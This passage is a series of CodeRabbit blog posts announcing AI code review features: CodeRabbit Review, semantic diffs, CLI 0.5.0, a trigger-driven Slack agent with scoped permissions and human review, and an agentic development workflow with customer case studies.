and opens up the door to the possibilities that AI can complete in terms of migrations, but the harder problem to solve is getting reviewers to understand the migrated code at large scale across any programming language. We need a view with details that can explain the intent behind those changes. We are solving this issue at CodeRabbit and I couldn’t be more excited about it. ## What we built: CodeRabbit Review Be honest with yourself for a second. How often do you read the code when doing a PR review? It’s fairly common for reviewers to not have the bandwidth to read through large PRs line-by-line and understand what has changed. I have been writing and reviewing code for close to two decades now and when I review code I look for intent and ensure the code solves the correct problem. Most of us do the same; we check why the PR is open and what problem it's trying to solve. In some cases, you have more context about how the changes can affect the codebase, so you look at the CI/CD pipeline and approve or leave a comment. So, if you think about the PR review process, the two most important things are intent and context. At CodeRabbit, we ship improvements to our context engineering approach daily and have SMEs fully dedicated to this process. With CodeRabbit Review, we are providing developers with everything they need to review a PR with the intent and context behind the changes. ![Dark themed code editor showing source code and a comments pane with review discussions.](https://victorious-bubble-f69a016683.media.strapiapp.com/image5_0e202ff207.jpg) The context and intent regarding the code changes stay where the code is, avoiding the back and forth that comes with context switching when reviewing code. CodeRabbit Review knows which changes should be reviewed together and stacks the changes, which makes the work easier for anyone looking at the PR and understand the changes with better context. ![A list of programming topics including Rust build, migration automation, and core primitives.](https://victorious-bubble-f69a016683.media.strapiapp.com/image6_8fc19b0206.jpg) It’s quite common for PR comments to get lost in the discussion and CodeRabbit Review helps navigate these situations and puts the comments right next to your files so they are easy to find to speed up the review process. ## Code review in OSS The open-source world is moving faster thanks to AI, and OSS maintainers can ship bug fixes and validate changes faster than ever. However, in conversations we’ve had with users, discussing large PRs with users is still an issue. CodeRabbit Review can handle this use case and allow maintainers to better understand changes to larger PRs in a faster amount of time. Try CodeRabbit Review on the next large PR in your queue. CodeRabbit Review is free for a limited time for every CodeRabbit user. You can find it by clicking Review Change Stack in the CodeRabbit PR summary comment.

CodeRabbit CLI 0.5.0: Easier setup, clearer org selection, and a new health check

Juan Pablo Flores — Thu, 21 May 2026 00:00:00 GMT

We are releasing [CodeRabbit CLI 0.5.0](https://docs.coderabbit.ai/cli/index), an update focused on making the CLI easier to start, easier to manage, and easier to fix when your local setup blocks a review. For example, if the CLI cannot authenticate, cannot reach CodeRabbit, cannot tell which organization should be used, or cannot read the repo state it needs, you now have clearer next steps. The CLI is often the fastest way to bring CodeRabbit into your local workflow. You install it, run a review from your terminal, and keep moving without leaving the code you are already working on. But the small setup moments around that flow matter. If login is missed during install, if a command needs authentication, if the wrong organization gets selected, or if a local setup issue is hard to diagnose, the experience slows down. CodeRabbit CLI 0.5.0 is designed to smooth out those moments. # Login happens when you need it Getting started with the CLI should feel direct. Now, when you run a command that requires you to login, CodeRabbit takes you straight into the login flow. You do not need to stop, look up the right command, or figure out why the CLI cannot continue. %[https://youtu.be/4sP4ZMjlyy8] We also improved the install flow so logging in is part of the setup path. That means fewer cases where the CLI is installed, but not ready to use. Install it, log in, and start running reviews. # Check your setup with \`coderabbit doctor\` Sometimes the CLI needs a quick health check. That is what \`coderabbit doctor\` is for. Run: ``` bash coderabbit doctor ``` %[https://youtu.be/OHxE5bVM0f4] It checks the parts of your local setup that matter most, including auth, network access, git state, and configuration. If something is off, you have a better place to start than guessing. It’s a simple command for answering: "Is my CLI setup healthy?" # Choose the right organization If you work across multiple organizations, CodeRabbit now gives you a clearer way to choose where CLI usage belongs. Instead of quietly defaulting to the first organization in your list, the CLI lets you select the right org. That helps make sure usage and billing go to the place you expect. %[https://youtu.be/8wkAD0DZZro] We also improved how CodeRabbit maps the current repo to the correct organization, so the CLI can better understand where it is being used. # Clearer upgrade paths when you hit limits If you are on the free plan and hit a rate limit, the CLI now gives you a clearer next step. Instead of leaving you stuck, CodeRabbit points you toward Pro Plus so you can keep going when you need more usage. This release is about making the CLI feel more ready when you need it. Less setup confusion, clearer account choices, and better tools when something needs a look.

The diff says 1,400 lines. The change is six

Konrad Sopala — Thu, 21 May 2026 00:00:00 GMT

You open the PR, and find it's an AI-authored change, and the diff shows 1,400 lines of code changed. Every moved line shows up as a delete on the left and an identical add on the right. The one line that actually changed is buried somewhere in the middle of all that, indistinguishable from the noise around it. So you do what you always do, and scroll through the changes and mentally subtract the moves until you find the substance. During your review process you are not reviewing what changed, but actually reverse-engineering it and then reviewing whatever’s left of your attention. That's what semantic diff view fixes. ## Meet the semantic diff view in CodeRabbit Review CodeRabbit Review now has a third way to look at a diff. Alongside Unified and Split views, there's a Semantic view that groups related code movement and token-level changes together, so large pull requests are actually inspectable (including AI-authored ones). ![A dark themed code editor displays a diff view with removed and added code lines.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_9b25979c63.png) The premise is the same one CodeRabbit Review was built on. AI-assisted development made PRs bigger and more frequent. A single change now routinely touches dozens of files across multiple layers. A flat, line-by-line diff was already a rough way to read that. When most of the diff is mechanical movement, it's worse than rough: it's actively hiding the change inside its own bookkeeping. Semantic mode reads the diff the way you would if you had the time to do it by hand. A block that moved is shown as a block that moved, not as a paired deletion and insertion you have to recognize and discount yourself. A token-level edit inside an otherwise-unchanged line is surfaced as the edit, not the whole line lighting up. What's left, once the noise is grouped and labeled, is the part you opened the PR to evaluate. %[https://youtu.be/pYWOBPhVdRU] It slots into everything CodeRabbit Review already does. You're still inside ordered cohorts and layers, anchored to specific line ranges, reading the range summary in the right panel and dropping inline comments that post back to GitHub natively. Semantic is just the lens you put over the diff once you're there. Toggle it from the diff header like you would unified or split. ## What else shipped alongside it [A few other updates](https://docs.coderabbit.ai/changelog#change-stack-diff-views) in CodeRabbit Review worth knowing about: * **All files view:** The left rail now has an All files entry for searching and jumping across every file in CodeRabbit's review scope, not just navigating cohort by cohort. When you already know the file you want, you go straight to it. * **Comment autocomplete:** The comment composer now does GitHub-style autocomplete: user and team mentions, issue and pull request references, metadata references, and emoji shortcodes. The comment you leave in CodeRabbit Review reads the same as one you'd type in GitHub, because it's the same syntax. * **Automatic line wrapping everywhere:** Diff lines now wrap automatically in every view, so there's no separate line-wrap toggle to find and flip. One less control between you and the code. None of these are headline features on their own. Together they remove the small frictions that add up when you're an hour into a large review. ## A quick refresher, if you missed CodeRabbit Review If this is the first you're hearing of CodeRabbit Review: it's a code review interface that reorganizes a pull request from a flat, alphabetical file list into a guided, layer-by-layer walkthrough. CodeRabbit groups related work into cohorts, orders the changes inside each one into layers so foundational changes come before the code that depends on them, writes a plain-language summary for each range, and generates a diagram inline where one actually earns its place. You open it from the **Review Change Stack** button in the CodeRabbit PR comment. It's an opt-in per reviewer. Teammates who want the default GitHub experience just ignore the button, and nothing about the PR changes for them. Full details are in the [documentation](https://docs.coderabbit.ai/pr-reviews/change-stack). ## Try it out The semantic diff view, the all files view, and comment autocomplete are live in CodeRabbit Review now. CodeRabbit Review is on GitHub, in early access, and available to all users currently. It'll be part of the Pro+ plan going forward. Next time an AI-authored PR lands and the diff looks like 1,400 lines of static, open it in CodeRabbit Review and switch to semantic. [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

The best agent in your Slack is the one nobody @mentioned

Konrad Sopala — Wed, 20 May 2026 00:00:00 GMT

Think about the most useful thing your AI agent did this week. Really pick one specific example. Now notice something about it: there's a decent chance nobody asked for it. The best work wasn't an answer to a prompt. It was already waiting in the thread before anyone showed up. That's not a quirk. That's the whole point, and most of the industry has the mental model pointed backwards. ## The chat box ate everyone's brain ChatGPT taught a hundred million people what AI is putting behind a text box: you type, it answers. The turn starts with you. That interface was so successful that it became the default model, and now nearly every "AI assistant" inherits the same buried assumption: a human has to open every turn. It's such a natural assumption that it's nearly invisible, which is exactly why it's worth saying out loud. If a person has to start every turn, then the agent's usefulness is capped by that person's attention. It can only ever help with problems someone already noticed, already framed well enough to type, and already had the time and presence of mind to ask about. Look at what that ceiling excludes: the latency spike at 2:38 a.m, the dependency advisory that landed while the team was asleep, the incident that started before anyone was watching the right channel. The most valuable problems an agent could touch are precisely the ones when nobody is awake or available to @mention. Bolt the agent to the prompt, and you've guaranteed it can't help with any of them. ## Invert the turn So invert it, and let the work start before the human. Datadog notices p99 latency climbing. A trigger fires. no message, no mention, nobody typing. The agent pulls the traces, walks the recent deployments, finds the PR that shipped a scaling config change disguised as an env var update, and posts that into the channel where the on-call engineer is about to be paged. Then a human arrives. Their first action isn't "let me ask the agent to look into this." Their first action is reading [what the agent already found](https://docs.coderabbit.ai/slack-agent/automations#triggers) and deciding what to do about it. Same agent. Same scope. Same instructions you'd have typed. The only thing that changed is who, or what, started the turn. The mechanic underneath is almost aggressively unglamorous: a source, a rule for which events are worth a run, instructions, and a destination. That's it. That small thing is what moves the agent from "useful when addressed" to "useful when it matters," and those are not the same product. %[https://youtu.be/bBBsXSvIm7Q] ## This changes the human's job, for the better In the prompt model, the human is the engine, and nothing happens until we take a turn. The agent is idle until addressed, and the human spends their attention starting it: noticing, framing, typing. In the trigger model, the agent is the engine and the human is judgment. The agent handles the monitoring and the legwork. The person does the part that was always theirs: deciding whether the revert is right, whether this is a SEV-2, whether to ship it now or wait. That's a strictly better division of labor. You want the expensive, irreplaceable thing, human judgment, spent on the decision and not on being a glorified start button. This is also the part people mean and don't quite say when they call an agent a "second brain." A second brain that only works when you address it is not a second brain. It's a reference desk. The useful version is the one that was already working on the problem before you asked. ## "I don't want it running around unsupervised" Good, you shouldn't, and it isn't. This is where the inversion gets misread as recklessness, so be precise about what actually happens. The agent runs under the scope of the channel it lives in: only the repositories, connections, and spend that surface allows, no matter what any instruction says. It fires only on sources you explicitly allowlisted, not on ambient chatter. It runs once as a trial on a real event before it ever goes live, so you correct the instructions before they're loose. And it posts into the thread where the team is already looking, which means the output is supervised by default. It lands in front of people, not in a log nobody reads. Supervision didn't disappear. It moved off the front of the task, the part where a human had to notice and ask, and onto the back, where a human reviews and decides. An agent that does its best work while you're asleep should be billed like time spent, not like a chat transcript, which is the entire reason we meter the active minute and not the token. ## Take the training wheels off Stop evaluating your agent by how well it answers prompts when you remember to ask. That benchmark rewards the chat box and quietly caps the agent at your attention span. Evaluate it by [what's already in the thread when you wake up](https://docs.coderabbit.ai/slack-agent/automations#triggers), the incident already triaged, the bad PR already found, the advisory already summarized with a recommended next step, none of it requested. The @mention starts to feel like what it always was: training wheels. A way to get going while you and the agent don't trust each other yet. Useful, real, not the destination. The best agent in your Slack is the one you never addressed. Build toward that one, and then take the training wheels off. Get started with [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent)

Explainable reviews: CodeRabbit Review and the context engine that make it possible

Yiwen Xu — Tue, 19 May 2026 00:00:00 GMT

CodeRabbit is the verification layer and quality gate that developers and organizations trust. But a great review does more than point out bugs or suggest fixes. It helps teams trace a change from implementation back to intent: what changed, why it matters, how to improve it, and whether it is safe to ship. That job is becoming harder as developers rely more on coding agents. AI is already changing the shape of software delivery: teams with high AI adoption are merging 98% more pull requests while spending 91% more time on review, according to a [Faros AI study](https://agentmarketcap.ai/blog/2026/04/13/91-percent-pr-review-bottleneck-ai-coding-agents-code-review-crisis-2026?utm_source=chatgpt.com) of more than 10,000 developers. When more code is being produced and shipped faster, review cannot just be about catching bugs. Teams need a better way to understand what changed, why it matters, and how it connects to the rest of the system before it ships. This is the idea behind [explainability](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent). [Harjot Gill](https://www.linkedin.com/in/harjotsgill), our CEO, has framed this as the agentic-era equivalent of cloud observability. As more coding work shifts to AI agents, humans need a new interface for understanding and trusting the output. Explainability is becoming the new observability: the layer that helps teams see, understand and verify what their systems and their agents are doing. ## From understanding the diff to understanding the change Recently we launched [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface), a new AI-native review interface that walks reviewers through a pull request like a senior engineer would. CodeRabbit already helps teams understand changes through summaries, walkthroughs, logic diagrams, and actionable review comments. CodeRabbit Review builds on that foundation by showing the path through a change, not just what changed, but how the pieces connect. ![GitHub bot comment displaying a "Review Change Stack" button and failed pre-merge checks.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_a50be3e3d4.png) As developers write less code by hand and rely more on agents to generate it, review shifts from "is this diff correct?" to "did the system build what we intended?" We call this [reviewing intent](https://www.coderabbit.ai/blog/nobody-is-going-to-read-the-code): verifying the plan and the outcome, not just the keystrokes. The diff has been the default review interface for nearly two decades. CodeRabbit Review shows what becomes possible when the system can explain the shape of a change and help developers verify that it matches their intent. For example, CodeRabbit reviews PRs using semantic diffs. Traditional line-by-line diffs treat a renamed variable, a reformatted block, and a real logic change as equally important, forcing reviewers to separate signal from noise by hand. Semantic diff understands the structure of the change. It filters out irrelevant changes, detects moved code, and surfaces only the changes that matter. Reviewers see what actually changed, so they can review code faster and more accurately. That experience is only possible because of the deeper system underneath: context engineering that understands intent, connects changes across files, reasons about impact, and explains the path through a pull request. ## What It actually takes to deliver Explainable Reviews: context engine and harness engineering At CodeRabbit, a trustworthy and explainable review starts long before the review comment is written. ### Inside the context engine For every PR, we build the context the model needs to reason accurately. We clone the repo, analyze the diff, and construct a code graph that traces how the change connects to the rest of the codebase cross-file and cross-repo. The context engine then pulls in the surrounding engineering knowledge linked issues, architecture standards, custom review instructions, coding conventions, past PRs, team-specific [learnings](https://docs.coderabbit.ai/knowledge-base/learnings), and through [MCP](https://docs.coderabbit.ai/knowledge-base/mcp-context#how-coderabbit-uses-mcp-during-analysis), the documents and systems your team builds against and filters all of it down to what is relevant to this specific change. Signals from [40+ linters and SAST tools](https://docs.coderabbit.ai/tools) feed in alongside, real-time web queries pull current release notes and newly disclosed vulnerabilities, and everything runs in an ephemeral, isolated sandbox with zero data retention. This is the work behind the work. In our system, we do a lot of work in context enrichment. The hard part isn't asking an LLM to review a diff. It's giving the model the right context, in the right order, at the right level of detail so it can understand intent, reason through impact, and explain its findings clearly. ![Flowchart illustrating an AI-powered code review process emphasizing context enrichment and agent-based verification.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_9040bacf39.png) ### The harness around it The harness around the context engine matters just as much. It routes each task to the right model by complexity: cheap and fast where deep reasoning isn't needed, frontier where it is, open models where they meet our quality bar. A review agent surfaces possible comments; verification agents filter them against the code guidelines, configuration, and team preferences before review comments reach developers. Underneath all of it sits an evaluation framework that tests every model release, prompt change, and context strategy against recall, precision, latency, and cost. That feedback loop is how we improve quality without just throwing more tokens at the problem. This is the system around the system: context retrieval, ranking, filtering, sandboxing, tool orchestration, prompt design, model routing, verification, and evaluation loops all working together. CodeRabbit has spent three years refining this harness across millions of pull requests and more than 15,000 engineering teams. That accumulated domain expertise, knowing which context matters for which kind of change, is the difference between a system that summarizes diffs and one that finds the issues that could derail what you intended to ship. ## Try CodeRabbit Review AI can write the code, but your team is still responsible for what ships. CodeRabbit is the AI-native quality gate that helps teams move fast without losing control. It provides instant explainability for every change and enforces consistent standards across every pull request, so what ships matches what you intended. Try [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) on the next large PR in your queue. CodeRabbit Review is free for a limited time for every CodeRabbit user. You can find it by clicking **Review Change Stack** in the CodeRabbit PR summary comment.

CodeRabbit Agent for Slack in action: Four workflows we caught on tape

Konrad Sopala — Tue, 19 May 2026 00:00:00 GMT

It's Monday, 9:14am. You open Slack and there are 47 unread channels, six DMs that start with "quick question," a Linear ticket someone @-mentioned you on Friday afternoon, a Datadog alert from Sunday night that someone else already hacked, and a customer escalation in \#eng-support that you can't tell is a known issue or a fresh regression. You haven't opened your IDE yet. You won't for another hour. The "real work" hasn't started because the context retrieval hasn't finished. This is the part of engineering nobody benchmarks. And it's the part [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) was built for. We've been recording short demos of CodeRabbit folks putting the agent to work on the workflows that actually fill an engineer's day. Below are four of them. Each one is a thing a person used to do manually, in 12 tabs, that now happens in a thread. ## 1. Hourly stale PR nudges, with the "what's this even about" baked in %[https://youtu.be/l3ANbujlgOc] If you're an engineering manager, you know the cadence. A PR opens Tuesday. By Thursday it's idle. By the following Wednesday it's a merge conflict, an outdated dependency, and a Slack apology thread. Stale PRs don't go stale because reviewers are lazy. They go stale because nobody on the channel can tell, at a glance, *what the PR is actually about* and whether it's blocking anything important. The PR title says "fix flaky test." Maybe. Maybe it's the auth refactor in disguise. Here's the automation: every hour, the agent scans open PRs idle for more than 8 hours. In your engineering channel, it posts one thread per stale PR with: * The author, @-mentioned * The assigned reviewer, @-mentioned * A one-line "what's this PR about" summary written from the diff and the description \- not the title That last bullet is the one that earns its keep. You scroll the channel, read the summary, you know in 30 seconds which PRs deserve your attention and which can wait until standup. The author gets a nudge that isn't passive-aggressive because it comes with context the reviewer actually needs. Yes, hourly is aggressive. It's also tunable: every 4 hours, twice a day, whatever cadence your team can absorb. ## 2. The "what shipped to prod this week" brief %[https://www.youtube.com/watch?v=Ahio4TrAxLY] At CodeRabbit, engineering ships constantly. New models, new finishing touches, new agent capabilities. Sometimes it's hard to keep up even from the inside. Marketing, support, and even other engineers can fall behind on what landed in prod during the week. That's why we have the agent brief us weekly on everything that's been pushed. Every week, in our internal channels, the agent drops: * Merged PRs grouped by area (agent, reviews, infra, IDE) * Customer-facing changes worth surfacing in release notes * Internal-only changes that affect how the team works * The deploys that actually went out, with timestamps * and many more… It's the changelog before the changelog. The product marketing team uses it, support uses, new hires use it. If you've ever joined a fast-moving team and felt like the org was a black box for the first month, you know exactly why this works. It's not a status meeting. It's not a Notion page nobody updates, it's a digest that writes itself, delivered where the team already reads. ## 3. Pylon ticket, DataDog, Linear \- PR merged. All in one thread. %[https://www.youtube.com/watch?v=XTFLmli2wmk] Internally, this is our favorite workflow. And when we've been showing this off to customers, it's the one that makes it clear how CodeRabbit Agent for Slack could work inside other organizations. A customer ticket lands in Pylon. A support engineer pastes it into \#eng-support and tags the agent. From there, in one Slack thread: * The agent reads the ticket and pulls the relevant DataDog traces * It correlates with the last 24 hours of merges and figures out which PR introduced the regression * It files a Linear issue with repro steps and assigns it to the right engineer * It drafts the fix PR and posts it for review * The PR gets reviewed, merged, and the agent replies in the original thread when the fix is out **Historically, this workflow was managed by three to four people and five tools. Now, it lives in one thread.** I'd like to call out here that not only did the agent do all of it, but the team saw all of it as well in a public channel. Support knew where their ticket went. Engineering knew where the lead came from. Anyone scrolling the channel a week later has the full incident trail, decisions and all, sitting in chronological order. The async dispatch model where you "send a task and wait" is replaced by a synchronous workflow the team can steer mid-flight. That last part is what we mean by an [agentic SDLC](https://coderabbit.ai/guides/agentic-sdlc). An agent that operates across the tools you already use, in the place you already work. ## 4. Monday-morning catch-up across the org %[https://youtu.be/a1_t-EVZbzw] You log off Friday. You come back Monday. The org didn't stop. A typical Monday playbook: skim 12 channels, click through GitHub notifications, find the design doc someone updated, figure out which incident in \#eng-incidents was actually serious, miss something important. Or: DM the agent. "Catch me up on the weekend." It goes through the org repos, the channels you have access to, the merged PRs, and the threads with activity, and gives you the brief. Not "here's everything that happened" but here's what's worth your attention. The PR that broke the staging deploy. The Linear ticket your teammate handed off to you on Saturday. The customer thread in \#eng-support that's still open. The architecture debate in \#platform that's about to surface at 11am. You read it in two minutes, and walk into your first meeting actually knowing what's happening. ## What ties these four together None of these are new ideas. Engineering teams have been writing scripts to do versions of this for years: cron jobs, custom Slack bots, internal newsletters someone heroically maintains for three months before life gets in the way. What's different now is that the agent has context. It reads your repo, your tickets, your traces, your threads and it scopes that access per channel, per team, per workspace. Spend, access, and memory are governed at the org level, not pushed down to whichever engineer felt like installing a CLI tool on Tuesday. That's the part that makes the four demos above repeatable instead of one-off magic tricks. The IDE was the right center of gravity when code was the system. Today, the system is the system and Slack is where the team actually talks about it. ## Try out CodeRabbit Agent for Slack Install it, add it to a channel, tag it in a thread and pick one of the workflows above to try first. [Get started with CodeRabbit Agent for Slack](https://coderabbit.link/cr-agent)

From intent to merged PR: The Agentic SDLC workflow teams are running in production with CodeRabbit

David Kravets — Mon, 18 May 2026 00:00:00 GMT

If you've been following the conversation around agentic development, you know the bottleneck has moved. Planning is the new quality gate. Review needs to run at the speed of generation. The conceptual case is made. What's harder to find is a concrete, end-to-end workflow that shows how those principles connect in practice, one with the tools, the sequence, and the evidence of what happens when teams actually run it. If you want the conceptual foundation, start with our [agentic SDLC guide](https://www.coderabbit.ai/guides/agentic-sdlc). What follows picks up where that leaves off, step by step, with some customer results to back it up. ## The real problem is coding speed's shadow Most teams adopting coding agents hit the same wall. The first few demos look great. A developer pastes a prompt into Claude Code, Codex, Cursor, or another agent and gets working code back in minutes. Everyone sees the upside immediately. Then production reality shows up. The ticket was underspecified. The prompt missed a constraint. The agent changed the right file in the wrong way. The pull request grew beyond scope. The review thread turned into a requirements clarification meeting. The model could code, but the workflow needed to catch up. Agents scale ambiguity into code. A workflow built for humans who self-correct slowly will buckle under that pressure. So a working agentic SDLC needs to catch misalignment before implementation, surface issues while context is still local, and enforce standards before merge. %[https://youtu.be/QH1DFN5IK6c?si=gtoXY75Z4t-yH50f] [Abnormal AI](https://www.coderabbit.ai/case-studies/how-abnormal-ai-scales-autonomous-development-with-coderabbit) learned this firsthand. As the cybersecurity company accelerated AI-generated code across 250 engineers, human review became the bottleneck. Output was scaling. The cost of getting something wrong stayed just as high. As Shrivu Shankar, VP of AI Strategy at Abnormal AI, put it: "AI-native tooling lets teams produce more code changes much faster, but the penalty for getting something wrong doesn't shrink. A subtle bug, a security issue, or a misaligned implementation still costs real time to diagnose, fix, retest, and potentially respond to." The teams winning with agents right now are building workflows around that question. Here is what that CodeRabbit workflow looks like: ## Step 1: Start with intent, before implementation Most bad agent workflows fail before a single line of code is written. They fail when a vague ticket gets treated like an execution-ready specification. "Add dark mode." "Support SSO." "Clean up auth." "Improve onboarding." Humans know those tickets are incomplete. Agents will run with them anyway. That is why the modern workflow starts with planning. [CodeRabbit Plan](https://www.coderabbit.ai/plan) turns an idea, ticket, or rough prompt into something an agent can actually use. Instead of treating planning as lightweight administrative work, it becomes the control layer for the rest of the agentic SDLC. ![Dark UI for creating a plan: input field, repository selector, and 'Create plan' button.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_05_15_at_12_38_02_PM_76d8f562eb.png) A good plan packages the context that implementation depends on: * What the system is supposed to do * Which files and components are likely involved * Which architectural decisions already exist * What related issues or prior pull requests matter * Where the likely constraints and edge cases live * What a phased implementation should look like The difference between a productive agent run and a costly one usually comes down to framing, whether the task carries enough context and specificity to avoid confident mistakes. Abnormal AI's engineering workflow illustrates why this matters. Rather than allocating tickets in standups, their teams write detailed specs collaboratively and delegate those specs to agents that implement changes in parallel. Human attention moves upstream, to writing clear intent and constraints, and downstream, to validation. CodeRabbit Plan is built to bring that same discipline to teams still figuring out how to structure the handoff between intent and implementation. ## Step 2: Convert the plan into an agent-ready handoff Traditional tickets are written for humans. Agentic workflows, however, need something more structured. The handoff has to preserve intent, constraints, and sequence. A high-level feature description is not enough. ![Open dropdown menu displays Cursor, VS Code, and Windsurf options in a dark interface.](https://victorious-bubble-f69a016683.media.strapiapp.com/agent_handoff_ec7191d3c5.png) Most teams end up doing invisible labor here. Someone reads the issue, digs through the codebase, finds related decisions in docs or old threads, figures out how the system actually works, and rewrites all of that into a better prompt for the agent. That work prevents rework. It just happens to be unglamorous. [CodeRabbit Plan](https://www.coderabbit.ai/plan) makes that work explicit. Instead of one developer mentally repackaging context for an agent, the workflow produces phased tasks, design rationale, research notes, and an agent-ready prompt that can be reviewed before execution. The handoff improves in two ways. First, the prompt is grounded in actual codebase and workflow context. Second, the plan becomes collaborative rather than living inside one developer's context window. This is the first major shift in the agentic SDLC. In the old flow, collaboration happened mostly after implementation, inside the pull request. In the new flow, teams align on the plan before the code exists. ## Step 3: Let the agent implement, with review close to the work Once the plan is solid, the agent can do what it does best, execute. ![AI era planning steps: decomposing problems, specifying criteria, context, feedback loops, and safety design.](https://victorious-bubble-f69a016683.media.strapiapp.com/Planning_in_the_AI_era_f38ac443f2.png) This is where the workflow branches by developer preference. Some teams work in terminal-native agents. Some use IDE-native assistants. Some operate inside Codex. The specific surface matters less than what happens next. Review should stay close to the work. That is why local workflows matter. [CodeRabbit Skills](https://www.coderabbit.ai/agent), the [CodeRabbit CLI](https://www.coderabbit.ai/cli), and the [CodeRabbit plugin for Codex](https://www.coderabbit.ai/agent) all move review into the same environment where code is being written and iterated on. When review stays in-session, a developer can catch issues while full implementation context is still fresh, ask the agent to fix problems immediately, and re-run review without switching tools. [Clerk's](https://www.coderabbit.ai/case-studies/inside-clerks-40-percent-faster-merge-workflow-with-coderabbit) engineers found this particularly valuable. Before CodeRabbit, getting early feedback meant waiting—sometimes overnight—for teammates in other time zones to review early-stage work. With in-session review available, Brandon Romano, Senior Staff Engineer at Clerk, described the shift directly: "I personally find it really nice that the time to first review is now minutes. I can fix it in my editor before I waste any time." In an agentic workflow, shorter validation loops matter more than shorter coding loops. Coding is already fast. Correcting wrong-but-plausible code is where teams lose time. ## Step 4: Open the PR after local review has already done some work The worst version of AI-assisted development is when a large volume of low-confidence code lands in a pull request, and review becomes the first serious validation step. That is how review turns into cleanup. A better workflow uses local review to catch obvious issues earlier, then uses pull request review as the shared decision point for the team. CodeRabbit's PR review layer serves that next step. Once code reaches the Git platform, the workflow shifts from helping one developer to helping the team converge on mergeable changes. The questions change: What real bugs or risks remain? Which findings are worth fixing now? Where is the change over-scoped or under-specified? [Common App](https://www.coderabbit.ai/case-studies/how-common-app-cut-code-review-time-by-35-percent-and-found-more-bugs) saw this dynamic clearly. Before CodeRabbit, their process required two manual reviewers per pull request, working through a detailed internal checklist, and still missing critical issues. After adopting CodeRabbit, they reduced code review time 35% and dropped to a single human reviewer per PR. CodeRabbit was handling baseline issues, freeing that reviewer to focus on business logic. Principal Software Developer Amit Kumar put it concretely: "Recently, CodeRabbit flagged a race condition,” he said. “Race conditions are difficult to catch manually, but CodeRabbit picked it up immediately." The measure that matters is high signal, catching what the team should act on before merge ## Step 5: Remediate in one pass Even when review is good, the remediation workflow can drag. A pull request with 10 useful comments still requires the developer to move each one into an agent separately. Copy, paste, run, and repeat, just to get back to a clean review state. Issue detection needs a fix path. CodeRabbbit, however, collects the prompts from review findings and turns them into a single structured instruction an agent can work through in one pass. Less busywork moving comments between tools. Fewer missed fixes. Faster convergence from review to merge. This is the second major shift in the agentic SDLC. Review becomes part of an iterative fix-and-verify loop, rather than a diagnostic stage the developer exits before remediation begins. ## Step 6: Enforce the definition of done before merge Even after a plan is approved, code is generated, the PR is reviewed, and issues are fixed, there’s one failure mode remaining. Teams forget things. The issue goes unlinked. The PR description stays incomplete. Sensitive data appears in logs. Required docstrings are missing. A change works technically but falls short of the team's merge standards. In a high-volume, agent-assisted workflow, these failures become more common. More changes move through the system, and standards that live only in people's heads do not scale. [Pre-Merge Checks](https://www.coderabbit.ai/#features) become the final control layer. They turn team expectations into enforceable rules that run automatically on pull requests. Some are built-in. Others can be written in plain English to reflect team-specific requirements. %[https://youtu.be/knoETRikfwg?si=YZCDktE1Ywo7-ASS] Enforcement that runs automatically, independent of whether a reviewer remembered the checklist that day, is what keeps the agentic SDLC reliable under higher code volume. ## What the full workflow looks like in practice Put it all together and the sequence is: ![Diagram detailing CodeRabbit AI Agent architecture, including clients, cloud run, knowledge base, and LLM providers.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Rabbit_Architecture_7f41b7d4b0.avif) A vague idea or ticket enters the system. [CodeRabbit Plan](https://www.coderabbit.ai/plan) turns that intent into a phased, context-rich plan. The plan becomes an agent-ready prompt with relevant codebase, issue, and knowledge context. A coding agent implements the change in the developer's preferred environment. CodeRabbit reviews the changes locally through the [CLI](https://www.coderabbit.ai/cli), [Skills](https://www.coderabbit.ai/agent), or an in-session plugin flow. The pull request opens with better code and fewer obvious issues. CodeRabbit catches remaining problems and surfaces what matters and helps the developer remediate review findings in one pass. [Pre-Merge Checks](https://www.coderabbit.ai/#features) enforce the team's non-negotiable rules. The pull request merges with less back-and-forth and less policy drift. Each step targets a different failure mode introduced by faster code generation. Planning reduces misalignment. Local review reduces context loss. PR review reduces escaped issues. Autofix remediation reduces friction. Pre-merge enforcement reduces inconsistency. The teams that get this right are the ones generating code with confidence, and shipping it the same way.

A major walkthrough upgrade: Explainable PRs and smarter reviewer routing

Konrad Sopala — Thu, 14 May 2026 00:00:00 GMT

Two updates to the CodeRabbit PR walkthrough went live recently, and together they're a meaningful upgrade to what the walkthrough actually does. One changes how you read a PR, and the other changes how it gets routed to reviewers. They sit in different parts of the flow, but they pull in the same direction: the walkthrough should explain the PR, not just describe it. A flat diff describes. A flat list of suggested reviewers describes. Neither helps you actually trust the change, or get it in front of the right people. These two updates do. ## Layer Based Walkthroughs: Read the PR in the order it was actually built You open a PR. The file list is alphabetical. ``` api/ db/ services/ tests/ utils/ web/ ``` You start scrolling and try to reconstruct what happened: was the migration the starting point, or did it come after the API change? Is this new service the cause of the type changes downstream, or a consequence? Where do the tests fit? This is the price of a flat diff. The order you read the changes in has no relationship to the order they were made in, or to which parts depend on which. You spend the first few minutes of every PR sorting that out before you can evaluate anything. It gets worse with AI-authored PRs. They tend to be larger and touch more files at once, so the mental reconstruction tax gets paid more often. And the cost of getting it wrong is higher, because there isn't a human across the desk to ask what they were thinking. We've written before about [explainability](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent), the idea that AI systems doing real work on things that matter have to show their homework, or the trust never quite materializes. A flat diff is the opposite of that. It tells you what changed, not how the change was reasoned about, what depends on what, or in what order things had to happen for the whole thing to make sense. The burden of figuring that out lands on whoever opens the PR. %[https://youtu.be/nT_YZuaE4Nw] Layer Based Walkthroughs are CodeRabbit's answer. Instead of an alphabetical file list, CodeRabbit reverse engineers how the change was actually built and organizes it into logical layers: what was changed first, what came next, and what depends on what. A typical PR walkthrough might be ordered: 1. Data models and schema changes 2. Backend logic that uses the new model 3. API responses that surface the new shape 4. Frontend or consumers that read the new responses 5. Tests covering the above ![GitHub walkthrough page 